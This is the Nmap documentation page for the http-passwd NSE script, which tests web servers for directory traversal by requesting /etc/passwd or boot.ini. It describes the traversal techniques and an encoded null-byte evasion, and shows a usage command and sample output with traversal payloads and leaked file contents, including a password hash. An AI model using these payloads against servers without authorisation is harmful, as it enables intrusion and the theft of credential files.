Home page logo
/
Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News

Sponsors


File http-passwd

Script types: portrule
Categories: intrusive, vuln
Download: http://nmap.org/svn/scripts/http-passwd.nse

User Summary

Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.

The script uses several technique:

  • Generic directory traversal by requesting paths like ../../../../etc/passwd.
  • Known specific traversals of several web servers.
  • Query string traversal. This sends traversals as query string parameters to paths that look like they refer to a local file name. The potential query is searched for in at the path controlled by the script argument http-passwd.root.

Script Arguments

http-passwd.root

Query string tests will be done relative to this path. The default value is /. Normally the value should contain a leading slash. The queries will be sent with a trailing encoded null byte to evade certain checks; see http://insecure.org/news/P55-01.txt.

http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

Example Usage

nmap --script http-passwd --script-args http-passwd.root=/test/ <target>

Script Output

80/tcp open  http
| http-passwd: Directory traversal found.
| Payload: "index.html?../../../../../boot.ini"
| Printing first 250 bytes:
| [boot loader]
| timeout=30
| default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
| [operating systems]
|_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect


80/tcp open  http
| http-passwd: Directory traversal found.
| Payload: "../../../../../../../../../../etc/passwd"
| Printing first 250 bytes:
| root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh
| sshd:*:65532:65534::/:/bin/false
| ftp:*:65533:65534::/:/bin/false
|_nobody:*:65534:65534::/:/bin/false

Requires


Author: Kris Katterjohn, Ange Gutek

License: Same as Nmap--See http://nmap.org/book/man-legal.html

Nmap Site Navigation

Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]